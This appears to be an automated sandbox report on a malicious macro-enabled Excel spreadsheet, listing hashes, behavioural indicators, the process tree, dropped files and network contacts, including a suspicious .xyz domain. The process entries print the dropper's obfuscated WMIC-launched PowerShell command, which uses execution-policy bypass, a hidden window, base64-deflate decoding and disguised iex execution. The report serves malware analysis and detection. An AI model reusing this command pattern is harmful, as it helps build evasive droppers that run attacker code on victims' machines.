File name: sample2.XLS
Full analysis: https://app.any.run/tasks/937774a2-8f88-4164-b790-aec18659dfd6
Verdict: Malicious activity
Analysis date: July 17, 2019, 07:59:59
OS: Windows 8.1 Professional (build: 9600, 64 bit)
Tags: macros, macros-on-open, opendir, maldoc-5
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: autore, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Jul 16 12:19:40 2019, Security: 0
MD5: 9582B06BFF0F2B43D6693150FCB49C6A
SHA1: 2A90CA7964576B9210C8F35234214F32B412684E
SHA256: 1145EEE29B0805AFBB9CF03FA578CF79A1F94C43125AE6F3D2867810248FB555
SSDEEP: 3072:PjvlYkRIPPm3eNCZmbpoahZhC0cixIiG0iIFLR8m9xe0VukmBj:rvlYkRIPPm3eNCZmbpoahZhC0cixIiGb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Reads the machine GUID from the registry

      • wMIc.exe (PID: 2068)
      • rundll32.exe (PID: 2580)
      • powErsHell.exe (PID: 2812)
      • rundll32.exe (PID: 936)
      • RuntimeBroker.exe (PID: 2500)
    • Executed via WMI

      • powErsHell.exe (PID: 2812)
      • wMIc.exe (PID: 2068)
    • PowerShell script executed

      • powErsHell.exe (PID: 2812)
    • Creates files in the user directory

      • powErsHell.exe (PID: 2812)
    • Checks supported languages

      • powErsHell.exe (PID: 2812)
    • Reads Internet Cache Settings

      • rundll32.exe (PID: 2580)
      • rundll32.exe (PID: 936)
    • Application launched itself

      • rundll32.exe (PID: 2580)
    • Uses RUNDLL32.EXE to load library

      • powErsHell.exe (PID: 2812)
      • rundll32.exe (PID: 2580)
    • Executed via COM

      • RuntimeBroker.exe (PID: 2500)
      • rundll32.exe (PID: 1724)
  • INFO

    • Creates files in the user directory

      • EXCEL.EXE (PID: 1224)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1224)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD: .xls | Microsoft Excel sheet (78.9)

EXIF (FlashPix):

CompObjUserType: (Foglio di lavoro di Microsoft Excel 2019
CompObjUserTypeLen: 42
HeadingPairs:
  • Fogli di lavoro
  • 1
TitleOfParts: 20190716-83748
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
ModifyDate: 2019:07:16 11:19:40
CreateDate: 2015:06:05 18:19:34
Software: Microsoft Excel
Author: autore
No data.
All screenshots are available in the full report
Total processes: 48
Monitored processes: 10
Malicious processes: 1
Suspicious processes: 1

Behavior graph

Nodes (in report order): start, excel.exe, wmic.exe (no specs), conhost.exe (no specs), powershell.exe, conhost.exe (no specs), rundll32.exe (no specs), rundll32.exe (no specs), rundll32.exe (no specs), runtimebroker.exe (no specs), rundll32.exe (no specs)

Process information

PID: 1224
CMD: "C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE" "C:\Users\admin\Desktop\sample2.XLS"
Path: C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Excel
Exit code: 0
Version: 15.0.4433.1506

PID: 2068
CMD: wMIc 'prOcess' "cALl" crEAtE "powErsHell -NoNiNtErAC -NoPrOFi -WIn 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 -EXECUtIoNpOLiC BYpAsS "\"`$kI="\" + ([ChAR]34).ToSTRing() + "\"MU(YY io.STreAMReadeR((YY IO.MicrosoftSiON.deFlaTestReAm([Io.MemOrYstReAM][CoNveRT]::FROMBaSe64STRInG('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' ) "\" +([Char]44).ToStriNg() +"\" [Io.MicrosoftSiON.MicrosoftsionMODE]::DEMicrosoftS ) ) "\" +([Char]44).ToStriNg() +"\"[TEXt.enCODIng]::aSCii)).READtoeNd()"\" + ([ChAR]34).ToSTRing() + "\".replace('Microsoft'"\" +([Char]44).ToStriNg() +"\"'compres');&('sa'+'l') ('YY') ('nEw-'+'OBjEc'+'T');&('s'+'al') ('MU') ('ie'+'X');MU(`$ki)"\"|& ( $SHeLLid[1]+$shellId[13]+'X')"
Path: C:\Windows\system32\wbem\wMIc.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: WMI Commandline Utility
Exit code: 0
Version: 6.3.9600.16384 (winblue_rtm.130821-1623)

PID: 2508
CMD: \??\C:\Windows\system32\conhost.exe 0xffffffff
Path: C:\Windows\system32\conhost.exe
Parent process: wMIc.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 6.3.9600.16384 (winblue_rtm.130821-1623)

PID: 2812
CMD: powErsHell -NoNiNtErAC -NoPrOFi -WIn 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 -EXECUtIoNpOLiC BYpAsS "\"`$kI="\" + ([ChAR]34).ToSTRing() + "\"MU(YY io.STreAMReadeR((YY IO.MicrosoftSiON.deFlaTestReAm([Io.MemOrYstReAM][CoNveRT]::FROMBaSe64STRInG('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' ) "\" +([Char]44).ToStriNg() +"\" [Io.MicrosoftSiON.MicrosoftsionMODE]::DEMicrosoftS ) ) "\" +([Char]44).ToStriNg() +"\"[TEXt.enCODIng]::aSCii)).READtoeNd()"\" + ([ChAR]34).ToSTRing() + "\".replace('Microsoft'"\" +([Char]44).ToStriNg() +"\"'compres');&('sa'+'l') ('YY') ('nEw-'+'OBjEc'+'T');&('s'+'al') ('MU') ('ie'+'X');MU(`$ki)"\"|& ( $SHeLLid[1]+$shellId[13]+'X')
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powErsHell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.3.9600.17396 (winblue_r4.141007-2030)

PID: 1928
CMD: \??\C:\Windows\system32\conhost.exe 0xffffffff
Path: C:\Windows\system32\conhost.exe
Parent process: powErsHell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 6.3.9600.16384 (winblue_rtm.130821-1623)

PID: 2580
CMD: "C:\Windows\system32\rundll32.exe" InetCpl.cpl ClearMyTracksByProcess 260
Path: C:\Windows\system32\rundll32.exe
Parent process: powErsHell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows host process (Rundll32)
Exit code: 0
Version: 6.3.9600.16384 (winblue_rtm.130821-1623)

PID: 936
CMD: C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:260 WinX:0 WinY:0 IEFrame:0000000000000000
Path: C:\Windows\system32\rundll32.exe
Parent process: rundll32.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Windows host process (Rundll32)
Exit code: 0
Version: 6.3.9600.16384 (winblue_rtm.130821-1623)

PID: 3040
CMD: "C:\Windows\system32\rundll32.exe" /s DllRegisterServer
Path: C:\Windows\system32\rundll32.exe
Parent process: powErsHell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows host process (Rundll32)
Exit code: 0
Version: 6.3.9600.16384 (winblue_rtm.130821-1623)

PID: 2500
CMD: C:\Windows\System32\RuntimeBroker.exe -Embedding
Path: C:\Windows\System32\RuntimeBroker.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Runtime Broker
Exit code: 0
Version: 6.3.9600.17415 (winblue_r4.141028-1500)

PID: 1724
CMD: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Path: C:\Windows\System32\rundll32.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows host process (Rundll32)
Exit code: 0
Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
Total events: 1 212
Read events: 902
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 7
Text files: 2
Unknown types: 5

Dropped files

(MD5 and SHA256 are listed only for the entries where the report recorded them.)

PID 1224 (EXCEL.EXE): C:\Users\admin\AppData\Local\Temp\CVR4A49.tmp.cvr
PID 1224 (EXCEL.EXE): C:\Users\admin\AppData\Local\Temp\~DF714A4F870C7BB2FB.TMP
PID 1224 (EXCEL.EXE): C:\Users\admin\AppData\Local\Temp\~DF1FC28AEF9A0AFE68.TMP
PID 1224 (EXCEL.EXE): C:\Users\admin\AppData\Local\Temp\~DF7FD0B51E169EAC63.TMP
PID 2812 (powErsHell.exe): C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2CT3OMLCJ5C6BXX87D4M.temp
PID 1224 (EXCEL.EXE): C:\Users\admin\AppData\Local\Temp\~DF86DFC923D75CF388.TMP
PID 1224 (EXCEL.EXE): C:\Users\admin\AppData\Local\Temp\~DFF792C0F23390CC6B.TMP
PID 1224 (EXCEL.EXE): C:\Users\admin\AppData\Local\Temp\~DF23B69EF8867CEB74.TMP
PID 1224 (EXCEL.EXE): C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd (type: tlb)
  MD5: 7C5D4C42DC17FE83E70B9EC3F26BA8E3
  SHA256: 10F1DF9184440BE6364B78582B15AEB2F76E51DD9C6F7CFDD0F73895D29905C5
PID 1224 (EXCEL.EXE): C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat (type: text)
  MD5: 1ADA8101959D96D88887BBCEB951262E
  SHA256: AD15134D8545E685942864895F5D09972780DA25055F38A0AB2640DC81F6C577
HTTP(S) requests: 2
TCP/UDP connections: 3
DNS requests: 4
Threats: 0

HTTP requests

PID 2812 (powErsHell.exe): GET http://apps.identrust.com/roots/dstrootcax3.p7c
  HTTP code: 200; IP: 192.35.177.64:80; CN: US; Type: cat; Size: 893 b; Reputation: shared
PID 2812 (powErsHell.exe): GET http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?87ad051395b0149f
  HTTP code: 200; IP: 95.140.132.86:80; CN: IT; Type: compressed; Size: 56.3 Kb; Reputation: whitelisted

Connections

PID 2812 (powErsHell.exe): 192.35.177.64:80, apps.identrust.com; ASN: IdenTrust; CN: US; Reputation: malicious
PID 2812 (powErsHell.exe): 185.158.249.75:443, woeiuyfgowe.xyz; ASN: easystores GmbH; CN: NL; Reputation: suspicious
PID 2812 (powErsHell.exe): 95.140.132.86:80, ctldl.windowsupdate.com; ASN: VSIX Nap del Nord Est; CN: IT; Reputation: unknown

DNS requests

www.microsoft.com: 2.21.38.54 (whitelisted)
woeiuyfgowe.xyz: 185.158.249.75 (suspicious)
apps.identrust.com: 192.35.177.64 (shared)
ctldl.windowsupdate.com: 95.140.132.86 (whitelisted)

Threats

No threats detected

Debug output (Process: Message)

EXCEL.EXE: SHIMVIEW: ShimInfo(Complete)